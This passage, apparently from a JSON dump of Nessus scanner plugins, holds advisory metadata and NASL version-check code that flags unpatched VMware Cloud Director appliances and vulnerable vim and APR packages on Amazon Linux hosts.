Cloud Director Appliance was upgraded to 10.5 from an older version. On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console) . This bypass is not present on port 443 (VCD provider and tenant login). On a new installation of VMware Cloud Director Appliance 10.5, the bypass is not present.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-11-17T00:00:00", "type": "nessus", "title": "VMware Cloud Director Authentication Bypass (VMSA-2023-0026)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-34060"], "modified": "2023-11-22T00:00:00", "cpe": ["cpe:/a:vmware:vcloud_director"], "id": "VMWARE_CLOUD_DIRECTOR_VMSA-2023-0026.NASL", "href": "https://www.tenable.com/plugins/nessus/185949", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(185949);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/22\");\n\n script_cve_id(\"CVE-2023-34060\");\n script_xref(name:\"VMSA\", value:\"2023-0026\");\n\n script_name(english:\"VMware Cloud Director Authentication Bypass (VMSA-2023-0026)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization appliance installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"VMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware Cloud Director \nAppliance was upgraded to 10.5 from an older version. On an upgraded version of VMware Cloud Director Appliance 10.5, \na malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 \n(ssh) or port 5480 (appliance management console) . This bypass is not present on port 443 (VCD provider and tenant \nlogin). On a new installation of VMware Cloud Director Appliance 10.5, the bypass is not present.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2023-0026.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/88176\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-34060\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/11/17\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcloud_director\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcloud_director_installed.nbin\");\n script_require_keys(\"Host/VMware vCloud Director/Version\", \"Host/VMware vCloud Director/Build\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nif (report_paranoia < 2) \n audit(AUDIT_PARANOID);\n\nvar version = get_kb_item_or_exit(\"Host/VMware vCloud Director/Version\");\n\nget_kb_item_or_exit('Host/PhotonOS/release');\n\nvar app_info = {\n 'version' : version,\n 'parsed_version': vcf::parse_version(version),\n 'app' : 'VMware vCloud Director'\n};\n\n# adding paranoid check, only deployments that have upgraded to 10.5 from an older release are impacted \nvar constraints = [ { 'equal' : '10.5.0', 'fixed_display' : 'See vendor advisory'} ];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-24T15:23:54", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2021-1728 advisory.\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875, CVE-2021-3968, CVE-2021-3973)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796, CVE-2021-3974)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-10T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : vim (ALAS-2021-1728)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3968", "CVE-2021-3973", "CVE-2021-3974"], "modified": "2023-11-22T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:vim-x11", "p-cpe:/a:amazon:linux:vim-common", "p-cpe:/a:amazon:linux:vim-debuginfo", "p-cpe:/a:amazon:linux:vim-enhanced", "p-cpe:/a:amazon:linux:vim-filesystem", "p-cpe:/a:amazon:linux:vim-minimal", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2021-1728.NASL", "href": "https://www.tenable.com/plugins/nessus/155982", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1728.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155982);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/22\");\n\n script_cve_id(\n \"CVE-2021-3778\",\n \"CVE-2021-3796\",\n \"CVE-2021-3872\",\n \"CVE-2021-3875\",\n \"CVE-2021-3968\",\n \"CVE-2021-3973\",\n \"CVE-2021-3974\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1728\");\n\n script_name(english:\"Amazon Linux 2 : vim (ALAS-2021-1728)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2021-1728 advisory.\n\n - vim is vulnerable to Heap-based Buffer Overflow (CVE-2021-3778, CVE-2021-3872, CVE-2021-3875,\n CVE-2021-3968, CVE-2021-3973)\n\n - vim is vulnerable to Use After Free (CVE-2021-3796, CVE-2021-3974)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1728.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/../../faqs.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3778.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3796.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3872.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3875.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3968.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3973.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3974.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update vim' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3973\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-3968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:vim-X11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:vim-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:vim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:vim-enhanced\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:vim-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:vim-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'vim-common-8.2.3642-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-common-8.2.3642-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-common-8.2.3642-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-debuginfo-8.2.3642-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-debuginfo-8.2.3642-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-debuginfo-8.2.3642-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-enhanced-8.2.3642-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-enhanced-8.2.3642-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-enhanced-8.2.3642-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-filesystem-8.2.3642-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-minimal-8.2.3642-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-minimal-8.2.3642-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-minimal-8.2.3642-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-X11-8.2.3642-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-X11-8.2.3642-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'vim-X11-8.2.3642-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim-X11 / vim-common / vim-debuginfo / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-22T13:09:01", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2023-016 advisory.\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\n - Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0. (CVE-2022-24963)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-03-21T00:00:00", "type": "nessus", "title": "Amazon Linux 2023 : apr, apr-devel (ALAS2023-2023-016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940", "CVE-2022-24963"], "modified": "2023-03-21T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:apr", "p-cpe:/a:amazon:linux:apr-debuginfo", "p-cpe:/a:amazon:linux:apr-debugsource", "p-cpe:/a:amazon:linux:apr-devel", "cpe:/o:amazon:linux:2023"], "id": "AL2023_ALAS2023-2023-016.NASL", "href": "https://www.tenable.com/plugins/nessus/173154", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2023 Security Advisory ALAS2023-2023-016.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(173154);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2021-35940\", \"CVE-2022-24963\");\n\n script_name(english:\"Amazon Linux 2023 : apr, apr-devel (ALAS2023-2023-016)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2023 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2023-016 advisory.\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime\n 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch,\n and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\n - Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR)\n allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR)\n version 1.7.0. (CVE-2022-24963)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2023/ALAS-2023-016.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-35940.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-24963.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update apr --releasever=2023.0.20230222 ' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35940\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-24963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apr-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apr-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2023\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"-2023\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2023\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'apr-1.7.2-2.amzn2023.0.2', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-1.7.2-2.amzn2023.0.2', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-1.7.2-2.amzn2023.0.2', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debuginfo-1.7.2-2.amzn2023.0.2', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debuginfo-1.7.2-2.amzn2023.0.2', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debuginfo-1.7.2-2.amzn2023.0.2', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debugsource-1.7.2-2.amzn2023.0.2', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debugsource-1.7.2-2.amzn2023.0.2', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debugsource-1.7.2-2.amzn2023.0.2', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-devel-1.7.2-2.amzn2023.0.2', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-devel-1.7.2-2.amzn2023.0.2', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-devel-1.7.2-2.amzn2023.0.2', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-debuginfo / apr-debugsource / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-22T13:03:56", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2023-1936 advisory.\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\n - Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0. (CVE-2022-24963)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-02-14T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : (ALAS-2023-1936)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940", "CVE-2022-24963"], "modified": "2023-02-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:apr", "p-cpe:/a:amazon:linux:apr-debuginfo", "p-cpe:/a:amazon:linux:apr-devel", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2023-1936.NASL", "href": "https://www.tenable.com/plugins/nessus/171468", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2023-1936.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(171468);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/14\");\n\n script_cve_id(\"CVE-2021-35940\", \"CVE-2022-24963\");\n\n script_name(english:\"Amazon Linux 2 : (ALAS-2023-1936)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2023-1936 advisory.\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime\n 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch,\n and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\n - Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR)\n allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR)\n version 1.7.0. (CVE-2022-24963)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2023-1936.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/../../faqs.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-35940.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-24963.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"pkg_manager = 'yum'Run ' update apr' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35940\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-24963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apr-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 